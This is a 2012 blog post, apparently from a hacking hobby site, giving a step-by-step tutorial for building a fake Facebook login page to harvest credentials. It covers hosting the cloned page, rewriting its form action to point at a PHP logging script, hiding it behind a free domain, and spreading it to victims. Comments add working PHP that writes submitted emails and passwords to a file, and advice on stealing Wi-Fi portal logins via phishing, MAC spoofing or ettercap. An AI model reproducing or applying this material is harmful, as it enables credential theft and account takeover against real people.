Feb 14, 2012

[Tutorial] Gaining Credentials Via Phishing/Fake Pages!

Was busy with studies so was unable to post sooner.
As mentioned in my earlier post, I am writing this tutorial about phishing pages.

So what is phishing?
Wikipedia defines phishing as:
"Phishing is a way of attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication."

So, in short it is a way of gaining user credentials via fake pages acting to be original ones.

Most of other tutorials you find in internet ask you to make an account in free hosting sites and host your phishing page and phishing script in it, and when you do it, your account gets blocked within a day because you are using it for illegal purpose.

I also tried the same at first, but got tired of getting my accounts blocked withing few hours.

So, here is a smart trick of doing it:
** Make an account in free hosting sites, my personal favorite is phpnet.us,
confirm it by checking your email.

** Now what you have to do is, not to upload the phising page in these servers but use pastehtml.com to host your fake/phising page.

Wondering what to do in the free hosting servers?? You upload your phishing script in this place. I got a script from somewhere I forgot (If anyone reading this is original author then please don't mind in sharing your work, Full credit for this script goes to you.)

Click here to get the script, save it as .php. and upload it in required place in the server.

** Go, to the page you want to make fake of, lets take facebook here.

** Get the source of facebook login page or simply just save the page.
open the page with text editor and find word "action" followed by a link inside inverted comma. Replace the link with link to your script.
for eg:

** upload the code to pastehtml.com.

** got to dot.tk and get a .tk domain name by pasting the link of your fake page from pastehtml.

** spread the page.

** whenever anyone logins in that page thinking that it is a real one, they get f**cked up. To find the user credentials and passwords login to your account in hosting site, you will find a .htm file with filename you specified in the php script.

Thats all good peoples, if you think this tutorial is not detailed enough, then please comment and give feedbacks, I will make it more easier with some screenshots too.


  1. will surely try this!!

  2. Every thing here works fine but the victim doesn't get redirected to the required page ...I could't find the error in the script you provided but I did a little research here and there so if you use this script there will be no flaws

  3. <?php
    header('Location:http://www.facebook.com ');
    $handle = fopen("hacked.txt", "a");
    fwrite($handle, "Email:$_POST[email]\tPassword:$_POST[pass]");

    PLEASE GIVE closing angle bracket after ?..the comment doesn't let you print the source itself

  4. thanks for the info. I will update it.

  5. I would like to ask you for another tutorial. How to crack/bypass web login screen and access to Wi-Fi internet?

    Example: You can connect to Wi-Fi network without any password but to access the internet you will
    neet to open web site in your web browser with required user name and password.



  6. This one, I do by gaining login info of real users by help of phishing page or MITM, i dont actually know how to bypass these login pages without knowing login info.

    Use the above tutorial, and instead of facebook, use the login page of the WIFI and gain credentials to login.

    Also, it depends on the security of the ISP, I have heard some of them can be simple bypassed by macspoofing too.

    The best option is using ettercap. I am not willing to write a tutorial on ettercap... as it is one of the most dangerous tools.. :)

  7. First off I want to say superb blog! I had a quick question that I'd like to ask if you do not mind. I was curious to know how you center yourself and clear your thoughts before writing. I have had a tough time clearing my thoughts in getting my thoughts out. I do take pleasure in writing however it just seems like the first 10 to 15 minutes are lost just trying to figure out how to begin. Any ideas or hints? Kudos!

    my blog: Best Cccam Provider